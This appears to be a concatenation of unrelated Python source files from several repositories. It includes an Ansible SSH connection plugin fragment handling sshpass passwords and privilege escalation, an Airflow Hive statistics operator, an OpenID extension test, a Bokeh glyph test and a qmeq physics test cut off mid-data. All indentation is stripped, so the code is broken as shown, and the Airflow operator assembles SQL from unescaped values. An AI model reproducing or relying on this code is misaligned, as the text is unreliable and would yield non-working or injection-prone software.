stdin = os.fdopen(master, 'wb', 0)
os.close(slave)
except (OSError, IOError):
p = None
if not p:
if PY3 and self._play_context.password:
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, pass_fds=self.sshpass_pipe)
else:
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdin = p.stdin
# If we are using SSH password authentication, write the password into
# the pipe we opened in _build_command.
if self._play_context.password:
os.close(self.sshpass_pipe[0])
try:
os.write(self.sshpass_pipe[1], to_bytes(self._play_context.password) + b'\n')
except OSError as e:
# Ignore broken pipe errors if the sshpass process has exited.
if e.errno != errno.EPIPE or p.poll() is None:
raise
os.close(self.sshpass_pipe[1])
#
# SSH state machine
#
# Now we read and accumulate output from the running process until it
# exits. Depending on the circumstances, we may also need to write an
# escalation password and/or pipelined input to the process.
states = [
'awaiting_prompt', 'awaiting_escalation', 'ready_to_send', 'awaiting_exit'
]
# Are we requesting privilege escalation? Right now, we may be invoked
# to execute sftp/scp with sudoable=True, but we can request escalation
# only when using ssh. Otherwise we can send initial data straightaway.
state = states.index('ready_to_send')
if b'ssh' in cmd:
if self._play_context.prompt:
# We're requesting escalation with a password, so we have to
# wait for a password prompt.
state = states.index('awaiting_prompt')
display.debug(u'Initial state: %s: %s' % (states[state], self._play_context.prompt))
elif self._play_context.become and self._play_context.success_key:
# We're requesting escalation without a password, so we have to
# detect success/failure before sending any initial data.
state = states.index('awaiting_escalation')
display.debug(u'Initial state: %s: %s' % (states[state], self._play_context.success_key))
# We store accumulated stdout and stderr output from the process here,
# but strip any privilege escalation prompt/confirmation lines first.
# Output is accumulated into tmp_*, complete lines are extracted into
# an array, then checked and removed or copied to stdout or stderr. We
# set any flags based on examining the output in self._flags.
b_stdout = b_stderr = b''
b_tmp_stdout = b_tmp_stderr = b''
self._flags = dict(
become_prompt=False, become_success=False,
become_error=False, become_nopasswd_error=False
)
# select timeout should be longer than the connect timeout, otherwise
# they will race each other when we can't connect, and the connect
# timeout usually fails
timeout = 2 + self._play_context.timeout
for fd in (p.stdout, p.stderr):
fcntl.fcntl(fd, fcntl.F_SETFL, fcntl.fcntl(fd, fcntl.F_GETFL) | os.O_NONBLOCK)
# TODO: bcoca would like to use SelectSelector() when open
# filehandles is low, then switch to more efficient ones when higher.
# select is faster when filehandles is low.
selector = selectors.DefaultSelector()
selector.register(p.stdout, selectors.EVENT_READ)
selector.register(p.stderr, selectors.EVENT_READ)
# If we can send initial data without waiting for anything, we do so
# before we start polling
if states[state] == 'ready_to_send' and in_data:
self._send_initial_data(stdin, in_data)
state += 1
try:
while True:
poll = p.poll()
events = selector.select(timeout)
# We pay attention to timeouts only while negotiating a prompt.
if not events:
# We timed out
if state <= states.index('awaiting_escalation'):
# If the process has already exited, then it's not really a
# timeout; we'll let the normal error handling deal with it.
if poll is not None:
break
self._terminate_process(p)
raise AnsibleError('Timeout (%ds) waiting for privilege escalation prompt: %s' % (timeout, to_native(b_stdout)))
# Read whatever output is available on stdout and stderr, and stop
# listening to the pipe if it's been closed.
for key, event in events:
if key.fileobj == p.stdout:
b_chunk = p.stdout.read()
if b_chunk == b'':
# stdout has been closed, stop watching it
selector.unregister(p.stdout)
# When ssh has ControlMaster (+ControlPath/Persist) enabled, the
# first connection goes into the background and we never see EOF
# on stderr. If we see EOF on stdout, lower the select timeout
# to reduce the time wasted selecting on stderr if we observe
# that the process has not yet existed after this EOF. Otherwise
# we may spend a long timeout period waiting for an EOF that is
# not going to arrive until the persisted connection closes.
timeout = 1
b_tmp_stdout += b_chunk
display.debug("stdout chunk (state=%s):\n>>>%s<<<\n" % (state, to_text(b_chunk)))
elif key.fileobj == p.stderr:
b_chunk = p.stderr.read()
if b_chunk == b'':
# stderr has been closed, stop watching it
selector.unregister(p.stderr)
b_tmp_stderr += b_chunk
display.debug("stderr chunk (state=%s):\n>>>%s<<<\n" % (state, to_text(b_chunk)))
# We examine the output line-by-line until we have negotiated any
# privilege escalation prompt and subsequent success/error message.
# Afterwards, we can accumulate output without looking at it.
if state < states.index('ready_to_send'):
if b_tmp_stdout:
b_output, b_unprocessed = self._examine_output('stdout', states[state], b_tmp_stdout, sudoable)
b_stdout += b_output
b_tmp_stdout = b_unprocessed
if b_tmp_stderr:
b_output, b_unprocessed = self._examine_output('stderr', states[state], b_tmp_stderr, sudoable)
b_stderr += b_output
b_tmp_stderr = b_unprocessed
else:
b_stdout += b_tmp_stdout
b_stderr += b_tmp_stderr
b_tmp_stdout = b_tmp_stderr = b''
# If we see a privilege escalation prompt, we send the password.
# (If we're expecting a prompt but the escalation succeeds, we
# didn't need the password and can carry on regardless.)
if states[state] == 'awaiting_prompt':
if self._flags['become_prompt']:
display.debug('Sending become_pass in response to prompt')
stdin.write(to_bytes(self._play_context.become_pass) + b'\n')
self._flags['become_prompt'] = False
state += 1
elif self._flags['become_success']:
state += 1
# We've requested escalation (with or without a password), now we
# wait for an error message or a successful escalation.
if states[state] == 'awaiting_escalation':
if self._flags['become_success']:
display.debug('Escalation succeeded')
self._flags['become_success'] = False
state += 1
elif self._flags['become_error']:
display.debug('Escalation failed')
self._terminate_process(p)
self._flags['become_error'] = False
raise AnsibleError('Incorrect %s password' % self._play_context.become_method)
elif self._flags['become_nopasswd_error']:
display.debug('Escalation requires password')
self._terminate_process(p)
self._flags['become_nopasswd_error'] = False
raise AnsibleError('Missing %s password' % self._play_context.become_method)
elif self._flags['become_prompt']:
# This shouldn't happen, because we should see the "Sorry,
# try again" message first.
display.debug('Escalation prompt repeated')
self._terminate_process(p)
self._flags['become_prompt'] = False
raise AnsibleError('Incorrect %s password' % self._play_context.become_method)
# Once we're sure that the privilege escalation prompt, if any, has
# been dealt with, we can send any initial data and start waiting
# for output.
if states[state] == 'ready_to_send':
if in_data:
self._send_initial_data(stdin, in_data)
state += 1
# Now we're awaiting_exit: has the child process exited? If it has,
# and we've read all available output from it, we're done.
if poll is not None:
if not selector.get_map() or not events:
break
# We should not see further writes to the stdout/stderr file
# descriptors after the process has closed, set the select
# timeout to gather any last writes we may have missed.
timeout = 0
continue
# If the process has not yet exited, but we've already read EOF from
# its stdout and stderr (and thus no longer watching any file
# descriptors), we can just wait for it to exit.
elif not selector.get_map():
p.wait()
break
# Otherwise there may still be outstanding data to read.
finally:
selector.close()
# close stdin after process is terminated and stdout/stderr are read
# completely (see also issue #848)
stdin.close()
if C.HOST_KEY_CHECKING:
if cmd[0] == b"sshpass" and p.returncode == 6:
raise AnsibleError('Using a SSH password instead of a key is not possible because Host Key checking is enabled and sshpass does not support '
'this. Please add this host\'s fingerprint to your known_hosts file to manage this host.')
controlpersisterror = b'Bad configuration option: ControlPersist' in b_stderr or b'unknown configuration option: ControlPersist' in b_stderr
if p.returncode != 0 and controlpersisterror:
raise AnsibleError('using -c ssh on certain older ssh versions may not support ControlPersist, set ANSIBLE_SSH_ARGS="" '
'(or ssh_args in [ssh_connection] section of the config file) before running again')
# If we find a broken pipe because of ControlPersist timeout expiring (see #16731),
# we raise a special exception so that we can retry a connection.
controlpersist_broken_pipe = b'mux_client_hello_exchange: write packet: Broken pipe' in b_stderr
if p.returncode == 255 and controlpersist_broken_pipe:
raise AnsibleControlPersistBrokenPipeError('SSH Error: data could not be sent because of ControlPersist broken pipe.')
if p.returncode == 255 and in_data and checkrc:
raise AnsibleConnectionFailure('SSH Error: data could not be sent to remote host "%s". Make sure this host can be reached over ssh' % self.host)
return (p.returncode, b_stdout, b_stderr)
@_ssh_retry
def _run(self, cmd, in_data, sudoable=True, checkrc=True):
"""Wrapper around _bare_run that retries the connection
"""
return self._bare_run(cmd, in_data, sudoable, checkrc)
@_ssh_retry
def _file_transport_command(self, in_path, out_path, sftp_action):
# scp and sftp require square brackets for IPv6 addresses, but
# accept them for hostnames and IPv4 addresses too.
host = '[%s]' % self.host
# Transfer methods to try
methods = []
# Use the transfer_method option if set, otherwise use scp_if_ssh
ssh_transfer_method = self._play_context.ssh_transfer_method
if ssh_transfer_method is not None:
if not (ssh_transfer_method in ('smart', 'sftp', 'scp', 'piped')):
raise AnsibleOptionsError('transfer_method needs to be one of [smart|sftp|scp|piped]')
if ssh_transfer_method == 'smart':
methods = ['sftp', 'scp', 'piped']
else:
methods = [ssh_transfer_method]
else:
# since this can be a non-bool now, we need to handle it correctly
scp_if_ssh = C.DEFAULT_SCP_IF_SSH
if not isinstance(scp_if_ssh, bool):
scp_if_ssh = scp_if_ssh.lower()
if scp_if_ssh in BOOLEANS:
scp_if_ssh = boolean(scp_if_ssh, strict=False)
elif scp_if_ssh != 'smart':
raise AnsibleOptionsError('scp_if_ssh needs to be one of [smart|True|False]')
if scp_if_ssh == 'smart':
methods = ['sftp', 'scp', 'piped']
elif scp_if_ssh is True:
methods = ['scp']
else:
methods = ['sftp']
success = False
for method in methods:
returncode = stdout = stderr = None
if method == 'sftp':
cmd = self._build_command('sftp', to_bytes(host))
in_data = u"{0} {1} {2}\n".format(sftp_action, shlex_quote(in_path), shlex_quote(out_path))
in_data = to_bytes(in_data, nonstring='passthru')
(returncode, stdout, stderr) = self._bare_run(cmd, in_data, checkrc=False)
elif method == 'scp':
if sftp_action == 'get':
cmd = self._build_command('scp', u'{0}:{1}'.format(host, shlex_quote(in_path)), out_path)
else:
cmd = self._build_command('scp', in_path, u'{0}:{1}'.format(host, shlex_quote(out_path)))
in_data = None
(returncode, stdout, stderr) = self._bare_run(cmd, in_data, checkrc=False)
elif method == 'piped':
if sftp_action == 'get':
# we pass sudoable=False to disable pty allocation, which
# would end up mixing stdout/stderr and screwing with newlines
(returncode, stdout, stderr) = self.exec_command('dd if=%s bs=%s' % (in_path, BUFSIZE), sudoable=False)
out_file = open(to_bytes(out_path, errors='surrogate_or_strict'), 'wb+')
out_file.write(stdout)
out_file.close()
else:
in_data = open(to_bytes(in_path, errors='surrogate_or_strict'), 'rb').read()
in_data = to_bytes(in_data, nonstring='passthru')
(returncode, stdout, stderr) = self.exec_command('dd of=%s bs=%s' % (out_path, BUFSIZE), in_data=in_data)
# Check the return code and rollover to next method if failed
if returncode == 0:
return (returncode, stdout, stderr)
else:
# If not in smart mode, the data will be printed by the raise below
if len(methods) > 1:
display.warning(msg='%s transfer mechanism failed on %s. Use ANSIBLE_DEBUG=1 to see detailed information' % (method, host))
display.debug(msg='%s' % to_native(stdout))
display.debug(msg='%s' % to_native(stderr))
if returncode == 255:
raise AnsibleConnectionFailure("Failed to connect to the host via %s: %s" % (method, to_native(stderr)))
else:
raise AnsibleError("failed to transfer file to %s %s:\n%s\n%s" %
(to_native(in_path), to_native(out_path), to_native(stdout), to_native(stderr)))
#
# Main public methods
#
def exec_command(self, cmd, in_data=None, sudoable=True):
''' run a command on the remote host '''
super(Connection, self).exec_command(cmd, in_data=in_data, sudoable=sudoable)
display.vvv(u"ESTABLISH SSH CONNECTION FOR USER: {0}".format(self._play_context.remote_user), host=self._play_context.remote_addr)
# we can only use tty when we are not pipelining the modules. piping
# data into /usr/bin/python inside a tty automatically invokes the
# python interactive-mode but the modules are not compatible with the
# interactive-mode ("unexpected indent" mainly because of empty lines)
ssh_executable = self._play_context.ssh_executable
if not in_data and sudoable:
args = (ssh_executable, '-tt', self.host, cmd)
else:
args = (ssh_executable, self.host, cmd)
cmd = self._build_command(*args)
(returncode, stdout, stderr) = self._run(cmd, in_data, sudoable=sudoable)
return (returncode, stdout, stderr)
def put_file(self, in_path, out_path):
''' transfer a file from local to remote '''
super(Connection, self).put_file(in_path, out_path)
display.vvv(u"PUT {0} TO {1}".format(in_path, out_path), host=self.host)
if not os.path.exists(to_bytes(in_path, errors='surrogate_or_strict')):
raise AnsibleFileNotFound("file or module does not exist: {0}".format(to_native(in_path)))
return self._file_transport_command(in_path, out_path, 'put')
def fetch_file(self, in_path, out_path):
''' fetch a file from remote to local '''
super(Connection, self).fetch_file(in_path, out_path)
display.vvv(u"FETCH {0} TO {1}".format(in_path, out_path), host=self.host)
return self._file_transport_command(in_path, out_path, 'get')
def reset(self):
# If we have a persistent ssh connection (ControlPersist), we can ask it to stop listening.
cmd = self._build_command(self._play_context.ssh_executable, '-O', 'stop', self.host)
controlpersist, controlpath = self._persistence_controls(cmd)
if controlpersist:
display.vvv(u'sending stop: %s' % cmd)
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
status_code = p.wait()
if status_code != 0:
raise AnsibleError("Cannot reset connection:\n%s" % stderr)
self.close()
def close(self):
self._connected = False
|
wangtuanjie/airflow
|
refs/heads/master
|
airflow/operators/hive_stats_operator.py
|
38
|
from builtins import str
from builtins import zip
from collections import OrderedDict
import json
import logging
from airflow.utils import AirflowException
from airflow.hooks import PrestoHook, HiveMetastoreHook, MySqlHook
from airflow.models import BaseOperator
from airflow.utils import apply_defaults
class HiveStatsCollectionOperator(BaseOperator):
"""
Gathers partition statistics using a dynamically generated Presto
query, inserts the stats into a MySql table with this format. Stats
overwrite themselves if you rerun the same date/partition.
``
CREATE TABLE hive_stats (
ds VARCHAR(16),
table_name VARCHAR(500),
metric VARCHAR(200),
value BIGINT
);
``
:param table: the source table, in the format ``database.table_name``
:type table: str
:param partition: the source partition
:type partition: dict of {col:value}
:param extra_exprs: dict of expression to run against the table where
keys are metric names and values are Presto compatible expressions
:type extra_exprs: dict
:param col_blacklist: list of columns to blacklist, consider
blacklisting blobs, large json columns, ...
:type col_blacklist: list
:param assignment_func: a function that receives a column name and
a type, and returns a dict of metric names and an Presto expressions.
If None is returned, the global defaults are applied. If an
empty dictionary is returned, no stats are computed for that
column.
:type assignment_func: function
"""
template_fields = ('table', 'partition', 'ds', 'dttm')
ui_color = '#aff7a6'
@apply_defaults
def __init__(
self,
table,
partition,
extra_exprs=None,
col_blacklist=None,
assignment_func=None,
metastore_conn_id='metastore_default',
presto_conn_id='presto_default',
mysql_conn_id='airflow_db',
*args, **kwargs):
super(HiveStatsCollectionOperator, self).__init__(*args, **kwargs)
self.table = table
self.partition = partition
self.extra_exprs = extra_exprs or {}
self.col_blacklist = col_blacklist or {}
self.metastore_conn_id = metastore_conn_id
self.presto_conn_id = presto_conn_id
self.mysql_conn_id = mysql_conn_id
self.assignment_func = assignment_func
self.ds = '{{ ds }}'
self.dttm = '{{ execution_date.isoformat() }}'
def get_default_exprs(self, col, col_type):
if col in self.col_blacklist:
return {}
d = {}
d[(col, 'non_null')] = "COUNT({col})"
if col_type in ['double', 'int', 'bigint', 'float', 'double']:
d[(col, 'sum')] = 'SUM({col})'
d[(col, 'min')] = 'MIN({col})'
d[(col, 'max')] = 'MAX({col})'
d[(col, 'avg')] = 'AVG({col})'
elif col_type == 'boolean':
d[(col, 'true')] = 'SUM(CASE WHEN {col} THEN 1 ELSE 0 END)'
d[(col, 'false')] = 'SUM(CASE WHEN NOT {col} THEN 1 ELSE 0 END)'
elif col_type in ['string']:
d[(col, 'len')] = 'SUM(CAST(LENGTH({col}) AS BIGINT))'
d[(col, 'approx_distinct')] = 'APPROX_DISTINCT({col})'
return {k: v.format(col=col) for k, v in d.items()}
def execute(self, context=None):
metastore = HiveMetastoreHook(metastore_conn_id=self.metastore_conn_id)
table = metastore.get_table(table_name=self.table)
field_types = {col.name: col.type for col in table.sd.cols}
exprs = {
('', 'count'): 'COUNT(*)'
}
for col, col_type in list(field_types.items()):
d = {}
if self.assignment_func:
d = self.assignment_func(col, col_type)
if d is None:
d = self.get_default_exprs(col, col_type)
else:
d = self.get_default_exprs(col, col_type)
exprs.update(d)
exprs.update(self.extra_exprs)
exprs = OrderedDict(exprs)
exprs_str = ",\n ".join([
v + " AS " + k[0] + '__' + k[1]
for k, v in exprs.items()])
where_clause = [
"{0} = '{1}'".format(k, v) for k, v in self.partition.items()]
where_clause = " AND\n ".join(where_clause)
sql = """
SELECT
{exprs_str}
FROM {self.table}
WHERE
{where_clause};
""".format(**locals())
hook = PrestoHook(presto_conn_id=self.presto_conn_id)
logging.info('Executing SQL check: ' + sql)
row = hook.get_first(hql=sql)
logging.info("Record: " + str(row))
if not row:
raise AirflowException("The query returned None")
part_json = json.dumps(self.partition, sort_keys=True)
logging.info("Deleting rows from previous runs if they exist")
mysql = MySqlHook(self.mysql_conn_id)
sql = """
SELECT 1 FROM hive_stats
WHERE
table_name='{self.table}' AND
partition_repr='{part_json}' AND
dttm='{self.dttm}'
LIMIT 1;
""".format(**locals())
if mysql.get_records(sql):
sql = """
DELETE FROM hive_stats
WHERE
table_name='{self.table}' AND
partition_repr='{part_json}' AND
dttm='{self.dttm}';
""".format(**locals())
mysql.run(sql)
logging.info("Pivoting and loading cells into the Airflow db")
rows = [
(self.ds, self.dttm, self.table, part_json) +
(r[0][0], r[0][1], r[1])
for r in zip(exprs, row)]
mysql.insert_rows(
table='hive_stats',
rows=rows,
target_fields=[
'ds',
'dttm',
'table_name',
'partition_repr',
'col',
'metric',
'value',
]
)
|
jcnelson/syndicate
|
refs/heads/master
|
old/ms/openid/test/test_extension.py
|
77
|
from openid import extension
from openid import message
import unittest
class DummyExtension(extension.Extension):
ns_uri = 'http://an.extension/'
ns_alias = 'dummy'
def getExtensionArgs(self):
return {}
class ToMessageTest(unittest.TestCase):
def test_OpenID1(self):
oid1_msg = message.Message(message.OPENID1_NS)
ext = DummyExtension()
ext.toMessage(oid1_msg)
namespaces = oid1_msg.namespaces
self.failUnless(namespaces.isImplicit(DummyExtension.ns_uri))
self.failUnlessEqual(
DummyExtension.ns_uri,
namespaces.getNamespaceURI(DummyExtension.ns_alias))
self.failUnlessEqual(DummyExtension.ns_alias,
namespaces.getAlias(DummyExtension.ns_uri))
def test_OpenID2(self):
oid2_msg = message.Message(message.OPENID2_NS)
ext = DummyExtension()
ext.toMessage(oid2_msg)
namespaces = oid2_msg.namespaces
self.failIf(namespaces.isImplicit(DummyExtension.ns_uri))
self.failUnlessEqual(
DummyExtension.ns_uri,
namespaces.getNamespaceURI(DummyExtension.ns_alias))
self.failUnlessEqual(DummyExtension.ns_alias,
namespaces.getAlias(DummyExtension.ns_uri))
|
almarklein/bokeh
|
refs/heads/master
|
tests/glyphs/Text.py
|
1
|
import numpy as np
from bokeh.document import Document
from bokeh.models import ColumnDataSource, DataRange1d, Plot, LinearAxis, Grid
from bokeh.models.glyphs import Text
from bokeh.plotting import show
N = 9
x = np.linspace(-2, 2, N)
y = x**2
a = "abcdefghijklmnopqrstuvwxyz"
text = [a[i*3:i*3+3] for i in range(N)]
source = ColumnDataSource(dict(x=x, y=y, text=text))
xdr = DataRange1d(sources=[source.columns("x")])
ydr = DataRange1d(sources=[source.columns("y")])
plot = Plot(
title=None, x_range=xdr, y_range=ydr, plot_width=300, plot_height=300,
h_symmetry=False, v_symmetry=False, min_border=0, toolbar_location=None)
glyph = Text(x="x", y="y", text="text", angle=0.3, text_color="#96deb3")
plot.add_glyph(source, glyph)
xaxis = LinearAxis()
plot.add_layout(xaxis, 'below')
yaxis = LinearAxis()
plot.add_layout(yaxis, 'left')
plot.add_layout(Grid(dimension=0, ticker=xaxis.ticker))
plot.add_layout(Grid(dimension=1, ticker=yaxis.ticker))
doc = Document()
doc.add(plot)
show(plot)
|
gedaskir/qmeq
|
refs/heads/master
|
qmeq/tests/test_baths.py
|
1
|
from numpy.linalg import norm
from qmeq.indexing import StateIndexing
from qmeq.baths import *
from qmeq.tests.test_leadstun import ParametersDoubleDotSpinful
EPS = 1e-14
class ParametersDoubleDotSpinfulElPh(ParametersDoubleDotSpinful):
def __init__(self):
ParametersDoubleDotSpinful.__init__(self)
self.nbaths = 2
self.velph = {
(0,0,0):1, (0,1,1):2, (0,0,1):1j, (0,1,0):1j, # bath 1, spin up
(1,0,0):3, (1,1,1):4, (1,0,1):2j, (1,1,0):2j, # bath 2, spin up
(0,2,2):1, (0,3,3):2, (0,2,3):1j, (0,3,2):1j, # bath 1, spin down
(1,2,2):3, (1,3,3):4, (1,2,3):2j, (1,3,2):2j, # bath 2, spin down
}
def test_construct_Vbbp():
data = {'Lin': [[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 2, 1j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 1j, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 2, 0, 0, 0, 1j, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 4, 1j, 0, 0, 1j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1j, 3, 0, 0, 0, 1j, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 1j, 0, 0, 0, 0], [0, 0, 0, 0, 1j, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 1j, 0, 0, 0, 3, 1j, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1j, 0, 0, 1j, 2, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 1j, 0, 0, 0, 4, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 1j, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1j, 4, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6]], [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 4, 2j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 2j, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 4, 0, 0, 0, 2j, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 8, 2j, 0, 0, 2j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 2j, 7, 0, 0, 0, 2j, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 11, 0, 0, 0, 2j, 0, 0, 0, 0], [0, 0, 0, 0, 2j, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 2j, 0, 0, 0, 7, 2j, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 2j, 0, 0, 2j, 6, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 2j, 0, 0, 0, 10, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 2j, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2j, 10, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 14]]],
'charge': [[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 2, 1j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 1j, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 2, 1j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1j, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 4, 1j, 1j, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1j, 3, 0, 1j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1j, 0, 3, 1j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 1j, 1j, 2, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 1j, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1j, 4, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 1j, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1j, 4, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6]], [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 4, 2j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 2j, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 4, 2j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 2j, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 8, 2j, 2j, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 2j, 7, 0, 2j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 2j, 0, 7, 2j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 2j, 2j, 6, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 2j, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2j, 10, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 2j, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2j, 10, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 14]]],
'sz': [[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 2, 1j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 1j, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 2, 1j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 1j, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 4, 1j, 1j, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1j, 3, 0, 1j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 1j, 0, 3, 1j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 1j, 1j, 2, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 1j, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1j, 4, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 1j, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1j, 4, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6]], [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 4, 2j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 2j, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 4, 2j, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 2j, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 8, 2j, 2j, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 2j, 7, 0, 2j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 2j, 0, 7, 2j, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 2j, 2j, 6, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 2j, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2j, 10, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 2j, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2j, 10, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 14]]],
